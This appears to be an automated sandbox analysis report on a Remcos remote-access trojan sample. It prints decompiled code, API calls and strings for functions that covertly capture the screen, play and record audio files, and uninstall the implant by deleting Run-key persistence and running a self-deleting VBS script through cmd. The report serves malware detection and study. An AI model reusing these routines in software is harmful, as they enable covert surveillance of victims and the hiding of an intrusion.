Instruction ID: 04bb12d9fe25f189a3e8844143b49d6f0c0574ad185b56a32ec544f6d92150a4
Opcode Fuzzy Hash: 70bc07612a7e46317a0bd45a797e311314827f706bb13391612c18c1031be34f
Instruction Fuzzy Hash: 0611E4B2E00228AFDB14DF69EC806EEB7F8EF84314F41416AE815E3140EB745E95CA80

Uniqueness

Uniqueness Score: -1.00%

Function 00414906, Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 298
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00414906(void* __ecx, char __edx, void* __eflags, signed int _a4) {
				void* _v12;
				char _v13;
				struct HDC__* _v20;
				signed int _v24;
				signed int _v28;
				int _v32;
				int _v36;
				struct HDC__* _v40;
				void* _v46;
				intOrPtr _v50;
				intOrPtr _v54;
				char _v56;
				char _v80;
				intOrPtr _v84;
				struct tagCURSORINFO _v100;
				signed int _v106;
				signed int _v108;
				long _v116;
				long _v120;
				char _v124;
				struct _ICONINFO _v144;
				char _v168;
				void* __ebx;
				int _t114;
				void* _t115;
				void* _t116;
				void* _t120;
				int _t127;
				void* _t128;
				signed char _t140;
				long _t146;
				void* _t147;
				int _t149;
				void* _t157;
				void* _t186;
				void* _t188;
				void* _t194;
				int _t199;
				void* _t204;
				void* _t223;
				signed int _t226;
				struct HDC__* _t228;
				struct HDC__* _t232;
				struct tagBITMAPINFO* _t234;
				void* _t235;
				int _t241;

				_v13 = __edx;
				_t194 = __ecx;
				_t232 = CreateDCA("DISPLAY", 0, 0, 0);
				_v20 = _t232;
				_t228 = CreateCompatibleDC(_t232);
				_v40 = _t228;
				_v32 = L00414D3D( *((intOrPtr*)(0x46bd78 + _a4 * 4)));
				_t114 = L00414D89( *((intOrPtr*)(0x46bd78 + _a4 * 4)));
				_t199 = _v32;
				_v36 = _t114;
				if(_t199 != 0 || _t114 != 0) {
					_t115 = CreateCompatibleBitmap(_t232, _t199, _t114);
					_v12 = _t115;
					__eflags = _t115;
					if(_t115 != 0) {
						_t116 = SelectObject(_t228, _t115);
						__eflags = _t116;
						if(_t116 != 0) {
							_v28 = _v28 & 0x00000000;
							_v24 = _v24 & 0x00000000;
							L00414DCA( *((intOrPtr*)(0x46bd78 + _a4 * 4)),  &_v28);
							_t120 = StretchBlt(_t228, 0, 0, _v32, _v36, _t232, _v28, _v24, _v32, _v36, 0xcc0020);
							__eflags = _t120;
							if(_t120 == 0) {
								goto L7;
							}
							__eflags = _v13;
							if(_v13 != 0) {
								_v100.cbSize = 0x14;
								_t186 = GetCursorInfo( &_v100);
								__eflags = _t186;
								if(_t186 != 0) {
									_t188 = GetIconInfo(_v100.hCursor,  &_v144);
									__eflags = _t188;
									if(_t188 != 0) {
										_t241 = _v84 - _v144.yHotspot - _v24;
										__eflags = _t241;
										DeleteObject(_v144.hbmColor);
										DeleteObject(_v144.hbmMask);
										_t228 = _v40;
										DrawIcon(_t228, _v100.ptScreenPos - _v144.xHotspot - _v28, _t241, _v100.hCursor);
										_t232 = _v20;
									}
								}
							}
							_push( &_v124);
							_t127 = 0x18;
							_t128 = GetObjectA(_v12, _t127, ??);
							__eflags = _t128;
							if(_t128 == 0) {
								goto L7;
							} else {
								_t226 = _v106 * _v108 & 0x0000ffff;
								__eflags = _t226 - 1;
								if(_t226 != 1) {
									_push(4);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										L24:
										__eflags = 1 << 1;
										_push(0x2eb6edc);
										L25:
										_t234 = LocalAlloc(0x40, ??);
										_t204 = 0x18;
										_t234->bmiHeader = 0x28;
										_t234->bmiHeader.biWidth = _v120;
										_t234->bmiHeader.biHeight = _v116;
										_t234->bmiHeader.biPlanes = _v108;
										_t234->bmiHeader.biBitCount = _v106;
										_t140 = _a4;
										__eflags = _t140 - _t204;
										if(_t140 < _t204) {
											__eflags = 1;
											_t234->bmiHeader.biClrUsed = 1 << _t140;
										}
										_t234->bmiHeader.biCompression = _t234->bmiHeader.biCompression & 0x00000000;
										_t234->bmiHeader.biClrImportant = _t234->bmiHeader.biClrImportant & 0x00000000;
										asm("cdq");
										_t227 = _t226 & 0x00000007;
										_t146 = (_t234->bmiHeader.biWidth + 7 + (_t226 & 0x00000007) >> 3) * (_a4 & 0x0000ffff) * _t234->bmiHeader.biHeight;
										_t234->bmiHeader.biSizeImage = _t146;
										_t147 = GlobalAlloc(0, _t146);
										_a4 = _t147;
										__eflags = _t147;
										if(_t147 != 0) {
											_t149 = GetDIBits(_t228, _v12, 0, _t234->bmiHeader.biHeight & 0x0000ffff, _t147, _t234, 0);
											__eflags = _t149;
											if(_t149 != 0) {
												_v56 = 0x4d42;
												_v54 = _t234->bmiHeader + _t234->bmiHeader.biSizeImage + _t234->bmiHeader.biClrUsed * 4 + 0xe;
												_v50 = 0;
												_t157 = _t234->bmiHeader + _t234->bmiHeader.biClrUsed * 4 + 0xe;
												__eflags = _t157;
												_v46 = _t157;
												E004020D5(_t194,  &_v80);
												E004020D5(_t194,  &_v168);
												E0040251D(_t194,  &_v80, _t227, __eflags,  &_v56, 0xe);
												E00403436( &_v80);
												E0040251D(_t194,  &_v80, _t227, __eflags, _t234, 0x28);
												E00403436( &_v80);
												_t235 = _a4;
												E0040251D(_t194,  &_v80, _t227, __eflags, _t235, _t234->bmiHeader.biSizeImage);
												E00403436( &_v80);
												DeleteObject(_v12);
												GlobalFree(_t235);
												DeleteDC(_v20);
												DeleteDC(_t228);
												E00402044(_t194, _t194, __eflags,  &_v168);
												L00401FC7();
												L00401FC7();
												goto L32;
											}
											DeleteDC(_v20);
											DeleteDC(_t228);
											DeleteObject(_v12);
											GlobalFree(_a4);
											goto L2;
										} else {
											_push(_v20);
											L8:
											DeleteDC();
											DeleteDC(_t228);
											_push(_v12);
											goto L5;
										}
									}
									_push(8);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										goto L24;
									}
									_push(0x10);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										goto L24;
									}
									_t223 = 0x18;
									__eflags = _t226 - _t223;
									if(_t226 > _t223) {
										_push(0x20);
										_pop(1);
										L23:
										_a4 = 1;
										goto L24;
									}
									_a4 = _t223;
									_push(0x28);
									goto L25;
								}
								goto L23;
							}
						}
						L7:
						_push(_t232);
						goto L8;
					} else {
						DeleteDC(_t232);
						DeleteDC(_t228);
						_push(0);
						L5:
						DeleteObject();
						goto L2;
					}
				} else {
					L2:
					E00402084(_t194, _t194, 0x45f6bc);
					L32:
					return _t194;
				}
			}

0x00414914
0x0041491f
0x00414927
0x0041492a
0x00414936
0x00414938
0x00414947
0x00414954
0x00414959
0x0041495c
0x00414961
0x0041497b
0x00414981
0x00414984
0x00414986
0x004149a0
0x004149a6
0x004149a8
0x004149c1
0x004149c5
0x004149d0
0x004149f0
0x004149f6
0x004149f8
0x00000000
0x00000000
0x004149fa
0x004149fe
0x00414a03
0x00414a0b
0x00414a11
0x00414a13
0x00414a1f
0x00414a25
0x00414a27
0x00414a41
0x00414a41
0x00414a44
0x00414a4d
0x00414a58
0x00414a5c
0x00414a62
0x00414a62
0x00414a27
0x00414a13
0x00414a68
0x00414a6b
0x00414a70
0x00414a76
0x00414a78
0x00000000
0x00414a7e
0x00414a85
0x00414a8b
0x00414a8e
0x00414a94
0x00414a96
0x00414a97
0x00414a9a
0x00414a9d
0x00414aca
0x00414aca
0x00414ad3
0x00414ad4
0x00414adc
0x00414ae0
0x00414ae1
0x00414aea
0x00414af0
0x00414af7
0x00414aff
0x00414b03
0x00414b06
0x00414b09
0x00414b10
0x00414b12
0x00414b12
0x00414b1e
0x00414b22
0x00414b26
0x00414b27
0x00414b35
0x00414b3c
0x00414b3f
0x00414b45
0x00414b48
0x00414b4a
0x00414b63
0x00414b69
0x00414b6b
0x00414b98
0x00414bac
0x00414bb1
0x00414bbc
0x00414bbc
0x00414bc2
0x00414bc5
0x00414bd0
0x00414bde
0x00414bed
0x00414bf8
0x00414c07
0x00414c0f
0x00414c16
0x00414c25
0x00414c2d
0x00414c34
0x00414c43
0x00414c46
0x00414c51
0x00414c5c
0x00414c64
0x00000000
0x00414c64
0x00414b76
0x00414b79
0x00414b7e
0x00414b88
0x00000000
0x00414b4c
0x00414b4c
0x004149ab
0x004149b1
0x004149b4
0x004149b6
0x00000000
0x004149b6
0x00414b4a
0x00414a9f
0x00414aa1
0x00414aa2
0x00414aa5
0x00414aa8
0x00000000
0x00000000
0x00414aaa
0x00414aac
0x00414aad
0x00414ab0
0x00414ab3
0x00000000
0x00000000
0x00414ab7
0x00414ab8
0x00414abb
0x00414ac4
0x00414ac6
0x00414ac7
0x00414ac7
0x00000000
0x00414ac7
0x00414abd
0x00414ac0
0x00000000
0x00414ac0
0x00000000
0x00414a90
0x00414a78
0x004149aa
0x004149aa
0x00000000
0x00414988
0x0041498f
0x00414992
0x00414994
0x00414996
0x00414996
0x00000000
0x00414996
0x00414967
0x00414967
0x0041496e
0x00414c6b
0x00414c71
0x00414c71

APIs

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00414921
CreateCompatibleDC.GDI32(00000000), ref: 0041492D

Part of subcall function 00414D3D: GetMonitorInfoW.USER32(?,?), ref: 00414D5D

Part of subcall function 00414D89: GetMonitorInfoW.USER32(?,?), ref: 00414DA9

CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 0041497B
DeleteDC.GDI32(00000000), ref: 0041498F
DeleteDC.GDI32(00000000), ref: 00414992
DeleteObject.GDI32(?), ref: 00414996
SelectObject.GDI32(00000000,00000000), ref: 004149A0
DeleteDC.GDI32(00000000), ref: 004149B1
DeleteDC.GDI32(00000000), ref: 004149B4
StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 004149F0
GetCursorInfo.USER32(?,?,?), ref: 00414A0B
GetIconInfo.USER32(?,?), ref: 00414A1F
DeleteObject.GDI32(?), ref: 00414A44
DeleteObject.GDI32(?), ref: 00414A4D
DrawIcon.USER32 ref: 00414A5C
GetObjectA.GDI32(?,00000018,?), ref: 00414A70
LocalAlloc.KERNEL32(00000040,00000001,?,?), ref: 00414AD6
GlobalAlloc.KERNEL32(00000000,?,?,?), ref: 00414B3F
GetDIBits.GDI32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 00414B63
DeleteDC.GDI32(?), ref: 00414B76
DeleteDC.GDI32(00000000), ref: 00414B79
DeleteObject.GDI32(?), ref: 00414B7E
GlobalFree.KERNEL32 ref: 00414B88
DeleteObject.GDI32(?), ref: 00414C2D
GlobalFree.KERNEL32 ref: 00414C34
DeleteDC.GDI32(?), ref: 00414C43
DeleteDC.GDI32(00000000), ref: 00414C46

Strings

DISPLAY, xrefs: 0041491A

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Delete$Object$Info$CreateGlobal$AllocCompatibleFreeIconMonitor$BitmapBitsCursorDrawLocalSelectStretch
String ID: DISPLAY
API String ID: 517350757-865373369
Opcode ID: 6ff8cbcc277d7720571f848809e7628165d438946616432f88157e7f1d5e0bb6
Instruction ID: 04b928e990297c4dc387ef5bf1f87de0b325f6e157068eb4714aaf8e6101e2a9
Opcode Fuzzy Hash: 6ff8cbcc277d7720571f848809e7628165d438946616432f88157e7f1d5e0bb6
Instruction Fuzzy Hash: 1DB17171900319AFDB10DFA0DC45BEEBBB8EF44756F00402AF949E7290DB74AA45CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040B0E2, Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 280
registryCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040B0E2(char _a4) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				short _v692;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t53;
				void* _t54;
				void* _t57;
				signed int _t61;
				void* _t62;
				void* _t78;
				void* _t79;
				void* _t92;
				void* _t93;
				signed char _t134;
				void* _t243;
				void* _t245;
				void* _t246;
				void* _t247;

				E0041015B();
				if( *0x46a9d4 != 0x30) {
					L00409D73();
				}
				_t243 =  *0x46bd6b - 1; // 0x0
				if(_t243 == 0) {
					E0041537E(_t243);
				}
				if( *0x46ba75 != 0) {
					E00417754(L00401EEB(0x46c0e0));
				}
				_t231 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				_t245 =  *0x46bb02 - 1; // 0x1
				if(_t245 == 0) {
					L00410D5C(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", L00401EEB(0x46c4e8));
				}
				_t246 =  *0x46bafb - 1; // 0x0
				if(_t246 == 0) {
					L00410D5C(0x80000002, _t231, L00401EEB(0x46c4e8));
				}
				_t247 =  *0x46bb00 - 1; // 0x0
				if(_t247 == 0) {
					L00410D5C(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", L00401EEB(0x46c4e8));
				}
				_t53 = E00402489();
				_t54 = L00401F95(0x46c560);
				_t57 = E00410A30(L00401F95(0x46c518), "exepath",  &_v692, 0x208, _t54, _t53);
				_t248 = _t57;
				if(_t57 == 0) {
					GetModuleFileNameW(0,  &_v692, 0x208);
				}
				RegDeleteKeyA(0x80000001, L00401F95(0x46c518));
				_t61 = SetFileAttributesW( &_v692, 0x80);
				_t140 = 0x46c530;
				asm("sbb bl, bl");
				_t134 =  ~_t61 & 0x00000001;
				_t62 = E004074E4(_t248);
				_t249 = _t62;
				if(_t62 != 0) {
					_t140 = 0x46c530;
					SetFileAttributesW(L00401EEB(0x46c530), 0x80);
				}
				E004030A6(_t134,  &_v124, E0040427F(_t134,  &_v52, E0043987F(_t134, _t140, _t249, L"Temp")), 0, _t249, L"\\update.vbs");
				L00401EF0();
				E00404405(_t134,  &_v28, L"On Error Resume Next\n", _t249, E0040427F(_t134,  &_v52, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"));
				L00401EF0();
				_t250 = _t134;
				if(_t134 != 0) {
					E00403311(E004030A6(_t134,  &_v52, E00404405(_t134,  &_v76, L"while fso.FileExists(\"", _t250, E0040427F(_t134,  &_v100,  &_v692)), 0, _t250, L"\")\n"));
					L00401EF0();
					L00401EF0();
					L00401EF0();
				}
				E00403311(E004030A6(_t134,  &_v100, E004030A6(_t134,  &_v76, E0040427F(_t134,  &_v52, L"fso.DeleteFile \""), 0, _t250,  &_v692), 0, _t250, L"\"\n"));
				L00401EF0();
				L00401EF0();
				L00401EF0();
				_t251 = _t134;
				if(_t134 != 0) {
					E0040766C(_t134,  &_v28, 0, L"wend\n");
				}
				_t78 = E004074E4(_t251);
				_t252 = _t78;
				if(_t78 != 0) {
					E00403311(E004030A6(0x45f724,  &_v100, L00409E69( &_v76, L"fso.DeleteFolder \"", _t252, 0x46c530), 0, _t252, L"\"\n"));
					L00401EF0();
					L00401EF0();
				}
				_t79 = E0040427F(0x45f724,  &_v172, L"\"\"\", 0");
				E00403311(E004030A6(0x45f724,  &_v100, E00403030( &_v76, E00404429(0x45f724,  &_v52, E0040427F(0x45f724,  &_v148, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), _t252,  &_a4), _t79), 0, _t252, "\n"));
				L00401EF0();
				L00401EF0();
				L00401EF0();
				L00401EF0();
				L00401EF0();
				E0040766C(0x45f724,  &_v28, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
				_t92 = L00401EEB( &_v124);
				_t93 = E00402489();
				if(E00417947(L00401EEB( &_v28), _t93 + _t93, _t92, 0) != 0 && ShellExecuteW(0, L"open", L00401EEB( &_v124), 0x45f724, 0x45f724, 0) > 0x20) {
					ExitProcess(0);
				}
				L00401EF0();
				L00401EF0();
				return L00401EF0();
			}

0x0040b0ee
0x0040b0fa
0x0040b0fc
0x0040b0fc
0x0040b104
0x0040b10a
0x0040b10c
0x0040b10c
0x0040b118
0x0040b126
0x0040b126
0x0040b130
0x0040b135
0x0040b13b
0x0040b14c
0x0040b151
0x0040b152
0x0040b158
0x0040b169
0x0040b16e
0x0040b16f
0x0040b175
0x0040b189
0x0040b18e
0x0040b196
0x0040b19e
0x0040b1c4
0x0040b1ce
0x0040b1d0
0x0040b1db
0x0040b1db
0x0040b1ee
0x0040b206
0x0040b211
0x0040b216
0x0040b218
0x0040b21b
0x0040b220
0x0040b222
0x0040b229
0x0040b234
0x0040b234
0x0040b254
0x0040b25d
0x0040b278
0x0040b281
0x0040b286
0x0040b288
0x0040b2bc
0x0040b2c4
0x0040b2cc
0x0040b2d4
0x0040b2d4
0x0040b30c
0x0040b314
0x0040b31c
0x0040b324
0x0040b329
0x0040b32b
0x0040b335
0x0040b335
0x0040b348
0x0040b34d
0x0040b34f
0x0040b374
0x0040b37c
0x0040b384
0x0040b384
0x0040b399
0x0040b3d8
0x0040b3e0
0x0040b3e8
0x0040b3f0
0x0040b3fb
0x0040b406
0x0040b413
0x0040b41c
0x0040b425
0x0040b443
0x0040b463
0x0040b463
0x0040b46c
0x0040b474
0x0040b487

APIs

Part of subcall function 0041015B: TerminateProcess.KERNEL32(00000000,0046C500,0040D1DC), ref: 0041016B
Part of subcall function 0041015B: WaitForSingleObject.KERNEL32(000000FF), ref: 0041017E

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B1DB
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040B1EE
SetFileAttributesW.KERNEL32(?,00000080), ref: 0040B206
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040B234

Part of subcall function 00409D73: TerminateThread.KERNEL32(0040884B,00000000,0046C500,0040ADA3,?,0046C518,0046C500), ref: 00409D82
Part of subcall function 00409D73: UnhookWindowsHookEx.USER32(00000000), ref: 00409D92
Part of subcall function 00409D73: TerminateThread.KERNEL32(00408830,00000000,?,0046C518,0046C500), ref: 00409DA4

Part of subcall function 00417947: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,0045F724,00000000,00000000,?,0040B0BC,00000000,00000000), ref: 00417986

ShellExecuteW.SHELL32(00000000,open,00000000,0045F724,0045F724,00000000), ref: 0040B457
ExitProcess.KERNEL32 ref: 0040B463

Strings

""", 0, xrefs: 0040B38E
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040B262
"), xrefs: 0040B28A
On Error Resume Next, xrefs: 0040B270
open, xrefs: 0040B451
Temp, xrefs: 0040B23B
fso.DeleteFolder ", xrefs: 0040B357
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040B40B
Remcos, xrefs: 0040B12B
exepath, xrefs: 0040B1B6
\update.vbs, xrefs: 0040B236
while fso.FileExists(", xrefs: 0040B29F
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040B3A3
wend, xrefs: 0040B32D
fso.DeleteFile ", xrefs: 0040B2E5
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040B17F
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040B130

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Remcos$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
API String ID: 1861856835-219127200
Opcode ID: bb25c8fdeaa4f241debf8e6a0405e14f512fb9588bc743e7edfe07456e5c5e86
Instruction ID: 15120c8502facc1a94d34f6ce0dfcdb30145111763f7023834469a4ad8d2fcb5
Opcode Fuzzy Hash: bb25c8fdeaa4f241debf8e6a0405e14f512fb9588bc743e7edfe07456e5c5e86
Instruction Fuzzy Hash: 52915E31A101185ACB14FBA1DCA6AEF776AAF50744F10007FB806771E3EF785E4A869D

Uniqueness

Uniqueness Score: -1.00%

Function 004169CC, Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 185
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004169CC(void* __ecx, void* __edx, char _a4) {
				char _v24;
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t25;
				void* _t28;
				void* _t43;
				void* _t60;
				void* _t63;
				void* _t67;
				CHAR* _t89;
				void* _t109;
				CHAR* _t110;
				void* _t111;
				void* _t114;
				void* _t118;

				_t103 = __edx;
				_t67 = __ecx;
				_t109 = __edx;
				if(L00416C12( &_a4, __ecx, __ecx) == 0xffffffff) {
					_t63 = L00401EEB( &_a4);
					_t103 = 0x30;
					L00401EFA( &_a4, 0x30, _t111, E0041805B( &_v28, 0x30, _t63));
					L00401EF0();
				}
				_t25 = E00402489();
				_t120 = _t25;
				if(_t25 == 0) {
					__eflags = PathFileExistsW(L00401EEB( &_a4));
					if(__eflags != 0) {
						goto L4;
					} else {
						E00402084(_t67, _t114 - 0x18, 0x45f6bc);
						_push(0xa8);
						L00404AA4(_t67, 0x46ca18, _t103, __eflags);
					}
				} else {
					_t60 = L00401EEB( &_a4);
					_t118 = _t114 - 0x18;
					E004020EC(_t67, _t118, _t103, _t120, _t109);
					E00417A4E(_t60);
					_t114 = _t118 + 0x18;
					L4:
					_t28 = E004172DA( &_v124, _t67);
					_t108 = E00403030( &_v28, E004030A6(_t67,  &_v76, L00409E69( &_v100, L"open \"", _t120,  &_a4), _t109, _t120, L"\" type "), _t28);
					E004030A6(_t67,  &_v52, _t32, _t109, _t120, L" alias audio");
					L00401EF0();
					L00401EF0();
					L00401EF0();
					L00401EF0();
					mciSendStringW(L00401EEB( &_v52), 0, 0, 0);
					mciSendStringA("play audio", 0, 0, 0);
					_t115 = _t114 - 0x18;
					E00402084(0, _t114 - 0x18, 0x45f6bc);
					_push(0xa9);
					L00404AA4(0, 0x46ca18, _t32, 0);
					_t43 = CreateEventA(0, 1, 0, 0);
					while(1) {
						L5:
						 *0x46bea8 = _t43;
						while(1) {
							_t122 = _t43;
							if(_t43 == 0) {
								break;
							}
							__eflags =  *0x46bea6; // 0x0
							if(__eflags != 0) {
								mciSendStringA("pause audio", 0, 0, 0);
								 *0x46bea6 = 0;
							}
							__eflags =  *0x46bea5; // 0x0
							if(__eflags != 0) {
								mciSendStringA("resume audio", 0, 0, 0);
								 *0x46bea5 = 0;
							}
							mciSendStringA("status audio mode",  &_v24, 0x14, 0);
							_t108 =  &_v24;
							_t110 = "stopped";
							_t89 = 0;
							while(1) {
								__eflags = ( *(_t108 + _t89) & 0x000000ff) -  *((intOrPtr*)(_t110 + _t89));
								if(( *(_t108 + _t89) & 0x000000ff) !=  *((intOrPtr*)(_t110 + _t89))) {
									break;
								}
								_t89 = _t89 + 1;
								__eflags = _t89 - 8;
								if(_t89 != 8) {
									continue;
								} else {
									SetEvent( *0x46bea8);
								}
								break;
							}
							__eflags = WaitForSingleObject( *0x46bea8, 0x1f4);
							if(__eflags != 0) {
								_t43 =  *0x46bea8; // 0x0
							} else {
								CloseHandle( *0x46bea8);
								_t43 = 0;
								goto L5;
							}
						}
						mciSendStringA("stop audio", 0, 0, 0);
						mciSendStringA("close audio", 0, 0, 0);
						E00402084(0, _t115 - 0x18, 0x45f6bc);
						_push(0xaa);
						L00404AA4(0, 0x46ca18, _t108, _t122);
						L00401EF0();
						goto L21;
					}
				}
				L21:
				return L00401EF0();
			}

0x004169cc
0x004169d6
0x004169d8
0x004169e6
0x004169eb
0x004169f1
0x00416a00
0x00416a08
0x00416a08
0x00416a0f
0x00416a17
0x00416a19
0x00416b06
0x00416b08
0x00000000
0x00416b0e
0x00416b18
0x00416b1d
0x00416b27
0x00416b27
0x00416a1f
0x00416a1f
0x00416a24
0x00416a2c
0x00416a33
0x00416a38
0x00416a3b
0x00416a45
0x00416a78
0x00416a7d
0x00416a86
0x00416a8e
0x00416a96
0x00416a9e
0x00416ab1
0x00416ac5
0x00416ac7
0x00416ad1
0x00416ad6
0x00416ae0
0x00416aea
0x00416af0
0x00416af0
0x00416af0
0x00416bc1
0x00416bc1
0x00416bc3
0x00000000
0x00000000
0x00416b31
0x00416b37
0x00416b41
0x00416b43
0x00416b43
0x00416b49
0x00416b4f
0x00416b59
0x00416b5b
0x00416b5b
0x00416b6d
0x00416b6f
0x00416b72
0x00416b77
0x00416b79
0x00416b7d
0x00416b80
0x00000000
0x00000000
0x00416b82
0x00416b83
0x00416b86
0x00000000
0x00416b88
0x00416b8e
0x00416b8e
0x00000000
0x00416b86
0x00416ba5
0x00416ba7
0x00416bbc
0x00416ba9
0x00416baf
0x00416bb5
0x00000000
0x00416bb5
0x00416ba7
0x00416bd1
0x00416bdb
0x00416be7
0x00416bec
0x00416bf6
0x00416bfe
0x00000000
0x00416bfe
0x00416af0
0x00416c03
0x00416c11

APIs

mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 00416AB1
mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00416AC5
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,0045F6BC), ref: 00416AEA
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,?,00000000,0046C238), ref: 00416B00
mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00416B41
mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 00416B59
mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 00416B6D
SetEvent.KERNEL32 ref: 00416B8E
WaitForSingleObject.KERNEL32(000001F4), ref: 00416B9F
CloseHandle.KERNEL32 ref: 00416BAF
mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00416BD1
mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 00416BDB

Strings

close audio, xrefs: 00416BD6
resume audio, xrefs: 00416B54
alias audio, xrefs: 00416A3B
status audio mode, xrefs: 00416B68
play audio, xrefs: 00416AC0
stopped, xrefs: 00416B72
stop audio, xrefs: 00416BCC
pause audio, xrefs: 00416B3C
" type , xrefs: 00416A53
open ", xrefs: 00416A4E

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
API String ID: 738084811-1354618412
Opcode ID: d18acea8baca26a07247505f498dbd4065cb79cf5edc96b7751cc9421d022e83
Instruction ID: 973dc57b0db8283a3ff3d0709b6d05c4eb7b4f2cac8df707c3dce394e9b06912
Opcode Fuzzy Hash: d18acea8baca26a07247505f498dbd4065cb79cf5edc96b7751cc9421d022e83
Instruction Fuzzy Hash: 755180716001086FD704BBB5DC92DFF3A6DDA41389B10413FF902A61E2EF799D8586AE

Uniqueness

Uniqueness Score: -1.00%

Function 00401A64, Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 155
fileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00401A64(WCHAR* __ecx, signed int __edx) {
				long _v8;
				void _v12;
				void _v16;
				void _v20;
				void _v24;
				void _v28;
				void _v32;
				signed int _t36;
				void** _t75;
				signed int _t80;
				void* _t81;
				signed int _t83;

				_t75 = __edx;
				_t80 =  *0x46ba9a & 0x0000ffff;
				_t83 = ( *0x46baa6 & 0x0000ffff) * _t80;
				_v20 = 1;
				_v16 = 0x10;
				_v24 = _t83 *  *0x46ba9c >> 3;
				asm("cdq");
				_v28 = _t83 + (__edx & 0x00000007) >> 3;
				_t36 =  *(__edx + 4) * _t80;
				_v32 = _t36;
				_v12 = _t36 + 0x24;
				_t81 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t81 != 0xffffffff) {
					WriteFile(_t81, "RIFF", 4,  &_v8, 0);
					WriteFile(_t81,  &_v12, 4,  &_v8, 0);
					WriteFile(_t81, "WAVE", 4,  &_v8, 0);
					WriteFile(_t81, "fmt ", 4,  &_v8, 0);
					WriteFile(_t81,  &_v16, 4,  &_v8, 0);
					WriteFile(_t81,  &_v20, 2,  &_v8, 0);
					WriteFile(_t81, 0x46ba9a, 2,  &_v8, 0);
					WriteFile(_t81, 0x46ba9c, 4,  &_v8, 0);
					WriteFile(_t81,  &_v24, 4,  &_v8, 0);
					WriteFile(_t81,  &_v28, 2,  &_v8, 0);
					WriteFile(_t81, 0x46baa6, 2,  &_v8, 0);
					WriteFile(_t81, "data", 4,  &_v8, 0);
					WriteFile(_t81,  &_v32, 4,  &_v8, 0);
					WriteFile(_t81,  *_t75, _t75[1],  &_v8, 0);
					CloseHandle(_t81);
					return 1;
				}
				return 0;
			}

0x00401a73
0x00401a76
0x00401a7d
0x00401a80
0x00401a87
0x00401a9a
0x00401a9f
0x00401ab0
0x00401ab8
0x00401ac3
0x00401ac9
0x00401ad2
0x00401ad7
0x00401af3
0x00401b02
0x00401b12
0x00401b22
0x00401b31
0x00401b40
0x00401b50
0x00401b60
0x00401b6f
0x00401b7e
0x00401b8e
0x00401b9e
0x00401bad
0x00401bbb
0x00401bbe
0x00000000
